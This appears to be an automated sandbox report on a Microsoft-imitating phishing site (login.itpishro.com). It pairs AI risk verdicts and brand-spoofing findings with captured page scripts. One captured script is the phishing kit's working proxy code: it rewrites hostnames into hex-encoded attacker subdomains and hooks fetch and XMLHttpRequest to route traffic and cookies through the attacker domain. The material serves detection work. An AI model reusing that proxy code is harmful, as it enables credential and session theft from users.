0)throw[O,30,q];if(b.value)return b.create();return b.create(q*5*q+-18*q+86),b.prototype},Sk=function(b,q,v,T,e){if(e=b[0],e==c9)q.L=true,q.W8=25,q.i(b);else if(e==D){T=b[1];try{v=q.H||q.i(b)}catch(G){t(G,q),v=q.H}b=q.X(),T(v),q.u+=q.X()-b}else if(e==Ay)b[3]&&(q.N=true),b[4]&&(q.L=true),q.i(b);else if(e==H9)q.N=true,q.i(b);else if(e==P9){try{for(v=0;v<q.s.length;v++)try{T=q.s[v],T[0][T[1]](T[2])}catch(G){}}catch(G){}((0,b[1])(function(G,d){q.IF(G,true,d)},(q.s=[],v=q.X(),function(G){n([go],(G=!q.Z.length,q)),G&&W(q,false,true)}),function(G){return q.Xh(G)},function(G,d){return q.t9(G,d)}),q).u+=q.X()-v}else{if(e==hy)return v=b[2],J(461,q,b[6]),J(6,q,v),q.i(b);e==go?(q.I=null,q.T=[],q.CU=[]):e==yP&&a.document.readyState==="loading"&&(q.K=function(G,d){function c(){d||(d=true,G())}(a.document.addEventListener("DOMContentLoaded",c,(d=false,F)),a).addEventListener("load",c,F)})}},w=function(b,q,v,T,e,G,d,c,P,E,Y,f,N,Q){if((c=l(q,246),c)>=q.D)throw[O,31];for(f=(Q=v,(T=0,q.c8).length),E=c;Q>0;)Y=E>>3,e=E%8,d=q.T[Y],N=8-(e|0),N=N<Q?N:Q,b&&(G=q,G.J!=E>>6&&(G.J=E>>6,P=l(G,278),G.P8=Zs(G.J,G.Y,[0,0,P[1],P[2]])),d^=q.P8[Y&f]),T|=(d>>8-(e|0)-(N|0)&(1<<N)-1)<<(Q|0)-(N|0) |
| URL: https://www.google.com/recaptcha/api2/anchor?ar=1&... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of the `recaptcha.anchor.Main.init()` function with encoded parameters suggests the potential for malicious activity. Additionally, the script interacts with an unknown domain (`www.google.com/js/bg/FsaNIYyPN76i0sL7d3myIoFfjMDAw8eHc9AJuLUrm7A.js`), which further increases the risk. Overall, this script demonstrates a high level of suspicion and should be thoroughly investigated."
} |
recaptcha.anchor.Main.init("[\x22ainput\x22,[\x22bgdata\x22,\x22Ly93d3cuZ29vZ2xlLmNvbS9qcy9iZy9Gc2FOSVl5UE43Nmkwc0w3ZDNteUlvRmZqTURBdzhlSGM5QUp1TFVybTdBLmpz\x22,\x22\x22,\x22QlVadTBmcE9zc05KNmJva2IvMjc5dEVhRVJ2Q1BwQWVJVXliY2IxdXFCTzNmRUhCY1ZEdXZIMDgvRCtVV3QyWmlLOHVZaTNBbGJYQUx2QjAxVHpFbjVGTWNZc3JkZ25CeGx4V1ZIL0Y1aDBvblNnSHRoUmNNSXZMZWt4a1hNS0tMUWd6QllST01wd29EdStCblY2RHpmdUhreWxrckN1Nk5RZmVpYnF3Z0sxb1hTRGozbGFKcVE0aWtweE1POVNXNnRHSTYyb2k3VkdyOFFySWxNWEx2QVJMaHd0VVlZYXAvUXk5N2NaRnJ4R3ZvR2cyVUYwb2FQcCs1MFZLdmZlVS9MU3NYZVo2WHpUM0pIQzJIN29XK2Z2aTVEUkRFRTFuaFgwWmgreEY5WHJmVitPZm9uSklyY2E1MnBDQWtwSGM0WElvVXJHNXgzQW9QZ0JJYSsxRlBBQnZRR0ErOTZmWnRESEoxOERPM2hwRWJLS3BjdUwrVHV2alpubU5DVVNsRXNGajZBeW5HUDdZOTRLcDA5YTF2dCtqdHFGOFJmL0JleSs2SnVSaWNOam1Rc09tK3pwbHJNbUdncHRCR29HckV5TklmU0x0djBRZ3JEaEJRR2RWYk5TRFVtUjRxVFR1YkpOd2FZVkowMGJCTGU5VmZtUUhtNllTT3FpeWliWjhaMUxjVWpIR1dIK0xaRTdXZ1NwS2F6SERKdVRYZnNtOUw5dlZBV3o3UWhJamkwcGtyd2Zxa29VRjdqeXJhcXM5d3RwekNZVU5FdytrNTBHNnZ0QUlpVCsvMFFCcE1JU2czYU8rZHZLMTkvVjB5enROODJMSUlVbDE3RE1uMGk1NWFoV1g1WE1FM1NHSXVISVo4cTd5QW5VV0tGeVpGUnVyKzJJcyt3MzFQNUN2cVc0bm44YUttQU01TjVBQ05Pd1h4VXRPcmF5aElTMjBiajJoQlJxSDlORVZQZ1RIK24zNlltWktyVE9lbUQwY1NRcHdLQXNWQnVrd29EQ0UxWWZRcCtwRGdqd1ZUeTF5Y1VUcmhYajJrbzBrcm5TZVlqZWkyRDN4bjN3aVpKR3ZFSGNxYnVDSEdWazhRYTlQanRZT284UHhCYmpWeXIzYk1ZZGcwUTFubzhib0VkSEJzWHRyM1hZaldUVUNHY3JtdVpaUCt1NFNBajBEeVFNR1ZmNkl2WDlBRlNLU0NlV1ErNXU2Smp5OVJRcFR6Wm9TL2xkZnU3OXNnb3ZrbXFRd1ZtZ2k4dUpETW52Q0hmZ3llLzk3a2JVdTFYMVVYb1p3Y004YmxSbXp2dWl4YnBRRlIxaWpIQng4WUZicUkwTjNwODc0U2Vvbnp4cGF1RGdMckJZVXZCQWJEMThaY3pJKzJTVTdLVzJaQS9qZnZlbmlBNDd2UDhHUzJXcXVVdk9CTys4ankxZkNlU0t0MlRJaUlFODQxQWxQYTdybXp4SGJjOHg2TDdYVWIvb1g1ZTN1Y0F3NGNVeVhEWjhtWkw5QUREY2FSdmpka1paNHJLbTd0WHE2ZVp3aVFXKzNubGNBZzF3Y1h6TlJGSnJHdk4rOXVNTmwwUm9BSDMzdkFwcGZYazRGL05yMFF4YklUMElLYXZFNktqSWExYWwvM0pHLzdOczNhWVY1dG1SQjhDVGRqTEZWaFVFc2RjT1lEbStOZ1dWOUNEa3FBVkR6Q0R2ZXorWUxhNnNwTzNJZVY5ckx4TzAwODQ2bDgxWENycGUrbVlYMHdMbGV6Yzh6SjdPZlRURE1JakplY0J6d0VXWmpzUW96eElVeW9sSTZYcFVNejNJL25tOC9ybnhYRVBkVjgremFtQjNHbHI3Q3lTblgzSHEzYldHZ05WdVQ1NUc2WHIvMkQ4SUxZNnZ3Z3RRVkRxMFYxVUo2NHFORS9aaTBIQ2dsSVIrTWlDQXkxa1A1NnZuVE1waWMrNFlFSUlSS0EyREg3SGM1Ull3WVhkeGV6ZDVTQnBpM1hUVEhTNEFIK0J4ZllWTWNuVUR5QUVMUnBDNy9jbHZWQWJsWTU0bGdHbmltVTM5TzIrRlE3RkFUdFVFVXU5SG1vVTFocEZDVHFhL3g1R1A2Q0JkdlpRWHEyZ0FXcXlIOWFSbDhiWGlVVktLQ1hIVk5PSHhVZ2xLNlA0c0FvS29mRnNwcW5vNkVZWDVOZHNkTmMrT1hsL2tvdzdxODBLUHNLUTA1NFFiY21HWTNjSzFURzBQMFNxWHJLZFBmOFQxWm1rSDlXV2R1Wm5RZDQyQUV2U1ZNb2d6bVlVdS9QWHZIWnVBQUV2ZUp4MmkxRk1UYW9QbHFYMGg0dDZycjJXNTR3YXZXOUJxc3ZxQVFlbk1CZkhSY1JKVkZzeURtSTA2QmI4cDYrb1hVSE5DUEZoNFNSOWJqalNDbmVSMnZZa1FxZGg4MFZLYVVkT2JJQ2NGVDZNQVEzVkc2d1JwOUxsN0tVU3ZpTnNtNmZqM3F6S2lITitFNmJDSUQ4YkVaTzlEV2N0Y3JoaDlGV2h2SFpLdWVZRE5kcXdrQUpYOFdrckE4ZGFIZFhaZ0Q0VGxMR0JmTzhrcVVJNlp2YURZbWZ0MkZXTldBU08ydEZ0K01FZlFUSHo0V3JRNVJyREdTT290REV6U3Q5WVFVL2FDWmJOdjhFQlhaYkdDYnBOYkloVElIRjQrRWM4K054a1BpZEtvVXlvUEswNEZQYXkwcVlBTVJjbmpqTGRmWnJRUTg3OWxkSDNpSTdSTFhTam9ka1FuQjB6YXNQME5CZ1lhNkhrMDZmczNFc0hJK3VlM2pHSW5qeEY3L09peUh1NnhKREExN1pheGNYWk9nT0t1M0tYcHR0eWppaTQ0cGcvSDdFMGZHRzJyT0NMWEJkSlZrUjR2Mm9YOFRxeGRIS3dDRkJxcWFDNncweHFYc2dFNDdnbHZZd3RhNWxRb3p0RU9rMWt6eVVlMStyWlJsMDYwZjB4ZkprN1duQzZDZ1F5YTZoMFFYSDNhWUlDMHZvaHU1K1lJekZ6aVB6eWZ2elFFVDRnMjhQalRDZFd3OVIxNEl5aldqNjM2WkxVQ0FUanppY2RxYzJLRnBRNDFRZFN5L3p5SHN4bHFPaVY2WmMwMmNkWE82UHljSnhPbTJTWGRTUXB6YzVVT0pMdzJTUi95ZURhNHNnS1haNXk2emFGVWI4bUVRRnhpNmp5MzM3eU9lNDl6VWNzUkVTd0h4aUtpVkdmbTAydG9oNkhkWiswd3FOMk8yOG9MR3ZMWXFDMGtkKzhhTlVtbzB5b29HbFAyd1hxOVVQY25TZktxMmYvNTZnUWw5ZUlUVFNFWFFSeUh2Q0IvY05YSlJwNHBWdTA3V3ZDc3hQR2p2Q2NCSzlDSXAyaTNZQmpIM1hibXdZemxGUjFNZzRldGpnUnpCQ1ROZmZQZkVkRGNic3oxVUNrT3RORTF5cmJhVXpIYzdvdDdHM2drNFhCMGhNNitYMXk5OXAySVNPZFUzdnNsOEhKejUrL3YwN1RQVXUxUXBKUGZRSmNVYWMzUVN3Q05PcUoxYWw3NmVxRy9lcFVkZzRqb1ludUl0UWtkMW5JSXptZEtGQkVCais5ZGU2czJUeWhaOU9zSEpkZnBFelEvQURYMGRxNDlUWHJINTU0L3JBcXhOMHpBVjh1U3NuTytJdXlsckFXNldtdzMrcUd6dU51TDh0VXRLTm1NNzRyTFVrbldqSlQ4Z1BsbWNmbHROcWg1YjF3SC9haWxGYjJhSnpYREpZVEQ1YjU3bFN1MGcyR24wMU8yV2lkVzFZRENub3ROZXhpVVBnakdQRXpOTzhYaTVLcnd |
| URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verifying...",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
 |
| URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verifying...",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
 |
| URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft",
"Cloudflare"
]
} |
|
| URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft",
"Cloudflare"
]
} |
 |
| URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verify you are human",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
 |
| URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verifying...",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
 |
| URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Success!",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
 |
| URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft",
"Cloudflare"
]
} |
|
| URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://login.itpishro.com/ Model: Joe Sandbox AI | ```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is classified as 'wellknown'.", "The URL 'login.itpishro.com' does not match the legitimate domain 'microsoft.com'.", "The domain 'itpishro.com' does not have any known association with Microsoft.", "The presence of 'login' as a subdomain is a common tactic used in phishing to mimic legitimate login pages.", "The domain name 'itpishro.com' is not a recognized Microsoft domain and could be suspicious." ], "riskscore": 9}
Google indexed: False |
URL: login.itpishro.com
Brands: Microsoft
Input Fields: unknown |
| URL: https://login.itpishro.com/?login_hint=billg@micro... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "This script exhibits several high-risk behaviors, including data exfiltration, obfuscated code/URLs, and redirects to suspicious domains. While some contextual factors like the use of trusted domains and analytics-like functionality may suggest legitimate intent, the overall aggressive and opaque nature of the script raises significant security concerns. Further investigation is warranted to determine the true purpose and potential risks."
} |
//<![CDATA[
$Config={"iMaxStackForKnockoutAsyncComponents":10000,"fShowButtons":true,"urlCdn":"https://61616463646e2e6d736674617574682e6e6574.itpishro.com/shared/1.0/","urlDefaultFavicon":"https://61616463646e2e6d736674617574682e6e6574.itpishro.com/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico","urlPost":"/login.srf?login_hint=billg%40microsoft.com\u0026client-request-id=efb7e3d4-abef-4708-9230-f206ec262df9\u0026sso_reload=True","iPawnIcon":0,"sPOST_Username":"","sFTName":"flowToken","fEnableOneDSClientTelemetry":true,"urlReportPageLoad":"https://login.itpishro.com/common/instrumentation/reportpageload?mkt=en-US","dynamicTenantBranding":null,"staticTenantBranding":null,"oAppCobranding":{},"iBackgroundImage":2,"fApplicationInsightsEnabled":false,"iApplicationInsightsEnabledPercentage":0,"urlSetDebugMode":"https://login.itpishro.com/common/debugmode","fEnableCssAnimation":true,"fAllowGrayOutLightBox":true,"fUseMsaSessionState":true,"fIsRemoteNGCSupported":true,"desktopSsoConfig":{"isEdgeAnaheimAllowed":true,"iwaEndpointUrlFormat":"https://6175746f6c6f676f6e2e6d6963726f736f6674617a75726561642d73736f2e636f6d.itpishro.com/{0}/winauth/sso?client-request-id=efb7e3d4-abef-4708-9230-f206ec262df9","iwaSsoProbeUrlFormat":"https://6175746f6c6f676f6e2e6d6963726f736f6674617a75726561642d73736f2e636f6d.itpishro.com/{0}/winauth/ssoprobe?client-request-id=efb7e3d4-abef-4708-9230-f206ec262df9","iwaIFrameUrlFormat":"https://6175746f6c6f676f6e2e6d6963726f736f6674617a75726561642d73736f2e636f6d.itpishro.com/{0}/winauth/iframe?client-request-id=efb7e3d4-abef-4708-9230-f206ec262df9\u0026isAdalRequest=False","iwaRequestTimeoutInMs":10000,"startDesktopSsoOnPageLoad":false,"progressAnimationTimeout":10000,"isEdgeAllowed":false,"minDssoEdgeVersion":"17","isSafariAllowed":true,"redirectUri":"","isIEAllowedForSsoProbe":true,"edgeRedirectUri":"https://6175746f6c6f676f6e2e6d6963726f736f6674617a75726561642d73736f2e636f6d.itpishro.com/common/winauth/sso/edgeredirect?client-request-id=efb7e3d4-abef-4708-9230-f206ec262df9\u0026origin=login.microsoftonline.com\u0026is_redirected=1","isFlowTokenPassedInEdge":true},"iSessionPullType":2,"fUseSameSite":true,"isGlobalTenant":true,"uiflavor":1001,"fOfflineAccountVisible":false,"fEnableUserStateFix":true,"fShowAccessPassPeek":true,"fUpdateSessionPollingLogic":true,"fEnableShowPickerCredObservable":true,"fFetchSessionsSkipDsso":true,"fUseNonMicrosoftDefaultBrandingForCiam":true,"fRemoveCustomCss":true,"fFixUICrashForApiRequestHandler":true,"fShowUpdatedKoreanPrivacyFooter":true,"fUsePostCssHotfix":true,"fFixUserFlowBranding":true,"fEnablePasskeyNullFix":true,"fEnableRefreshCookiesFix":true,"scid":2001,"hpgact":2101,"hpgid":6,"apiCanary":"PAQABDgEAAADW6jl31mB3T7ugrWTT8pFezS03eppXDJapxkhHDljTuH7hbmL5bIWGrmiNeoLL8A6DdXKyBcwLJiR38SRDpcmMeXDyx-TjWq-AeXDX-tk8Bw3F7qdWhYwAAVTfj45K1GT0_5Ni0Ch9mgV1bQlfR0ENphoN5iFwnDqGTeLN9RGc1JXcrNWnARjMbUuluuhxtl1J5_n4Z5Q1nGIoSHjaUd5ILWqSlUJo8KZuQgA4g8uGZSAA","canary":"qUV8jJIY4JdiJsq8jUURWfGnrZS1LoQtM2sx1+EI6IY=6:1:CANARY:61/9XI3fvdb4FX216jL9nMYk3+uQOLYSs9EeHxo9T0s=","sCanaryTokenName":"canary","fSkipRenderingNewCanaryToken":false,"fEnableNewCsrfProtection":true,"correlationId":"efb7e3d4-abef-4708-9230-f206ec262df9","sessionId":"4dcfd241-fa19-424f-b737-f937cedc3c00","locale":{"mkt":"en-US","lcid":1033},"slMaxRetry":2,"slReportFailure":true,"strings":{"desktopsso":{"authenticatingmessage":"Trying to sign you in"}},"enums":{"ClientMetricsModes":{"None":0,"SubmitOnPost":1,"SubmitOnRedirect":2,"InstrumentPlt":4}},"urls":{"instr":{"pageload":"https://login.itpishro.com/common/instrumentation/reportpageload","dssostatus":"https://login.itpishro.com/common/instrumentation/dssostatus"}},"browser":{"ltr":1,"Chrome":1,"_Win":1,"_M117":1,"_D0":1,"Full":1,"Win81":1,"RE_WebKit":1,"b":{"name":"Chrome","major":117,"minor":0},"os":{"name":"Windows","version":"10.0"},"V":"117.0"},"watson":{"url":"/common/handlers/watson","bundle":"https://61616463646e2e6d736674617574682e6e6574.itpishro.com/ests/2.1/ |
| URL: https://login.itpishro.com/?login_hint=billg@micro... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet exhibits several behaviors that raise moderate security concerns. It includes dynamic code manipulation, data exfiltration, and URL obfuscation, which are considered moderate-risk indicators. However, the script also appears to have some legitimate functionality, such as cookie handling and URL patching, which mitigates the overall risk. Further review may be necessary to determine the full context and intent of the script."
} |
(function(){
var getLocation = function(href) {
var l = document.createElement("a");
l.href = href;
return l;
};
function encoderSub(str) {
var hex = '';
for(var i=0;i<str.length;i++) {
hex += ''+str.charCodeAt(i).toString(16);
}
return hex;
}
function setUrl(baseurl,host){
if(host.includes(baseurl)){
return host;
}
dash_url = encoderSub(host);
return dash_url + "." + baseurl;
}
function patch(url){
baseUrl = "itpishro.com";
urlparts = getLocation(url);
if(urlparts.hostname.includes(baseUrl)){
return url;
}
return url.replace("https://"+urlparts.hostname,location.protocol + "//"+setUrl(baseUrl,urlparts.hostname));
}
function getCookie(cname) {
let name = cname + "=";
let decodedCookie = decodeURIComponent(document.cookie);
let ca = decodedCookie.split(';');
for(let i = 0; i <ca.length; i++) {
let c = ca[i];
while (c.charAt(0) == ' ') {
c = c.substring(1);
}
if (c.indexOf(name) == 0) {
return c.substring(name.length, c.length);
}
}
return "";
}
var pSend = window.XMLHttpRequest.prototype.send;
window.XMLHttpRequest.prototype.send = function() {
//add cookies
this.setRequestHeader("vfff9080", getCookie("vfff9080"));
return pSend.apply(this, [].slice.call(arguments));
};
const constantMock = window.fetch;
window.fetch = function() {
console.log(typeof arguments[0]);
if(typeof arguments[0] == "object"){
arguments[0] = new Request(patch(arguments[0].url),arguments[0]);
// console.log(arguments[0]);
}
else{
arguments[0] = patch(arguments[0]);
}
return new Promise((resolve, reject) => {
constantMock
.apply(this, arguments)
.then((response) => {
resolve(response);
})
.catch((error) => {
reject(response);
})
});
}
})();
|
| URL: https://login.itpishro.com/?login_hint=billg@micro... Model: Joe Sandbox AI | ```json
{
"risk_score": 3,
"reasoning": "The script contains legacy practices and tracking behavior, such as logging and event registration, but does not exhibit high-risk behaviors like dynamic code execution or data exfiltration. The script appears to be part of a debugging or logging framework, with no clear malicious intent."
} |
//<![CDATA[
!function(){var e=window,r=e.$Debug=e.$Debug||{},t=e.$Config||{};if(!r.appendLog){var n=[],o=0;r.appendLog=function(e){var r=t.maxDebugLog||25,i=(new Date).toUTCString()+":"+e;n.push(o+":"+i),n.length>r&&n.shift(),o++},r.getLogs=function(){return n}}}(),function(){function e(e,r){function t(i){var a=e[i];if(i<n-1){return void(o.r[a]?t(i+1):o.when(a,function(){t(i+1)}))}r(a)}var n=e.length;t(0)}function r(e,r,i){function a(){var e=!!s.method,o=e?s.method:i[0],a=s.extraArgs||[],u=n.$WebWatson;try{
var c=t(i,!e);if(a&&a.length>0){for(var d=a.length,l=0;l<d;l++){c.push(a[l])}}o.apply(r,c)}catch(e){return void(u&&u.submitFromException&&u.submitFromException(e))}}var s=o.r&&o.r[e];return r=r||this,s&&(s.skipTimeout?a():n.setTimeout(a,0)),s}function t(e,r){return Array.prototype.slice.call(e,r?1:0)}var n=window;n.$Do||(n.$Do={"q":[],"r":[],"removeItems":[],"lock":0,"o":[]});var o=n.$Do;o.when=function(t,n){function i(e){r(e,a,s)||o.q.push({"id":e,"c":a,"a":s})}var a=0,s=[],u=1;"function"==typeof n||(a=n,
u=2);for(var c=u;c<arguments.length;c++){s.push(arguments[c])}t instanceof Array?e(t,i):i(t)},o.register=function(e,t,n){if(!o.r[e]){o.o.push(e);var i={};if(t&&(i.method=t),n&&(i.skipTimeout=n),arguments&&arguments.length>3){i.extraArgs=[];for(var a=3;a<arguments.length;a++){i.extraArgs.push(arguments[a])}}o.r[e]=i,o.lock++;try{for(var s=0;s<o.q.length;s++){var u=o.q[s];u.id==e&&r(e,u.c,u.a)&&o.removeItems.push(u)}}catch(e){throw e}finally{if(0===--o.lock){for(var c=0;c<o.removeItems.length;c++){
for(var d=o.removeItems[c],l=0;l<o.q.length;l++){if(o.q[l]===d){o.q.splice(l,1);break}}}o.removeItems=[]}}}},o.unregister=function(e){o.r[e]&&delete o.r[e]}}(),function(e,r){function t(){if(!a){if(!r.body){return void setTimeout(t)}a=!0,e.$Do.register("doc.ready",0,!0)}}function n(){if(!s){if(!r.body){return void setTimeout(n)}t(),s=!0,e.$Do.register("doc.load",0,!0),i()}}function o(e){(r.addEventListener||"load"===e.type||"complete"===r.readyState)&&t()}function i(){
r.addEventListener?(r.removeEventListener("DOMContentLoaded",o,!1),e.removeEventListener("load",n,!1)):r.attachEvent&&(r.detachEvent("onreadystatechange",o),e.detachEvent("onload",n))}var a=!1,s=!1;if("complete"===r.readyState){return void setTimeout(n)}!function(){r.addEventListener?(r.addEventListener("DOMContentLoaded",o,!1),e.addEventListener("load",n,!1)):r.attachEvent&&(r.attachEvent("onreadystatechange",o),e.attachEvent("onload",n))}()}(window,document),function(){function e(){
return f.$Config||f.ServerData||{}}function r(e,r){var t=f.$Debug;t&&t.appendLog&&(r&&(e+=" '"+(r.src||r.href||"")+"'",e+=", id:"+(r.id||""),e+=", async:"+(r.async||""),e+=", defer:"+(r.defer||"")),t.appendLog(e))}function t(){var e=f.$B;if(void 0===d){if(e){d=e.IE}else{var r=f.navigator.userAgent;d=-1!==r.indexOf("MSIE ")||-1!==r.indexOf("Trident/")}}return d}function n(){var e=f.$B;if(void 0===l){if(e){l=e.RE_Edge}else{var r=f.navigator.userAgent;l=-1!==r.indexOf("Edge")}}return l}function o(e){
var r=e.indexOf("?"),t=r>-1?r:e.length,n=e.lastIndexOf(".",t);return e.substring(n,n+h.length).toLowerCase()===h}function i(){var r=e();return(r.loader||{}).slReportFailure||r.slReportFailure||!1}function a(){return(e().loader||{}).redirectToErrorPageOnLoadFailure||!1}function s(){return(e().loader||{}).logByThrowing||!1}function u(e){if(!t()&&!n()){return!1}var r=e.src||e.href||"";if(!r){return!0}if(o(r)){var i,a,s;try{i=e.sheet,a=i&&i.cssRules,s=!1}catch(e){s=!0}if(i&&!a&&s){return!0}
if(i&&a&&0===a.length){return!0}}return!1}function c(){function t(e){g.getElementsByTagName("head")[0].appendChild(e)}function n(e,r,t,n){var u=null;return u=o(e)?i(e):"script"===n.toLowerCase()?a(e):s(e,n),r&&(u.id=r),"function"==typeof u.setAttribute&&(u.setAttribute("rickorigin","anonymous"),t&&"string"==typeof t&&u.setAttribute("xintegrity",t)),u}function i(e){var r=g.createElement("link");return r.rel="stylesheet",r.type="text/css",r.href=e,r}function a(e){
var r=g.createElement("script"),t=g.querySelector("s |
| URL: https://6d7366742e7374732e6d6963726f736f66742e636f6d.itpishro.com/adfs/ls/?login_hint=billg%40microsoft.com&client-request-id=f5acd101-dfbb-4fdd-8a12-aa6a66d0a51c&username=billg%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3Afederation%3AMicrosoftOnline&wctx Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Sign in with PIN or smartcard",
"prominent_button_name": "unknown",
"text_input_field_labels": [
"Password"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
 |
| URL: https://6d7366742e7374732e6d6963726f736f66742e636f6d.itpishro.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": true,
"malicious_keywords": false,
"encoded_characters": true,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": true,
"third_party_hosting": true
} |
URL: https://6d7366742e7374732e6d6963726f736f66742e636f6d.itpishro.com |
| URL: https://6d7366742e7374732e6d6963726f736f66742e636f6d.itpishro.com/adfs/ls/?login_hint=billg%40microsoft.com&client-request-id=f5acd101-dfbb-4fdd-8a12-aa6a66d0a51c&username=billg%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3Afederation%3AMicrosoftOnline&wctx Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://6d7366742e7374732e6d6963726f736f66742e636f6d.itpishro.com/adfs/ls/?login_hint=billg%40microsoft.com&client-request-id=f5acd101-dfbb-4fdd-8a12-aa6a66d0a51c&username=billg%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3Afederation%3AMicrosoftOnline&wctx Model: Joe Sandbox AI | ```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is classified as 'wellknown'.", "The legitimate domain for Microsoft is 'microsoft.com'.", "The provided URL '6d7366742e7374732e6d6963726f736f66742e636f6d.itpishro.com' does not match the legitimate domain.", "The URL contains a suspicious subdomain structure and an unrelated domain 'itpishro.com'.", "The presence of a password input field on a non-legitimate domain is a common phishing tactic." ], "riskscore": 9}
Google indexed: False |
URL: 6d7366742e7374732e6d6963726f736f66742e636f6d.itpishro.com
Brands: Microsoft
Input Fields: Password |
Edit tour
chrome.exe (PID: 3748 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node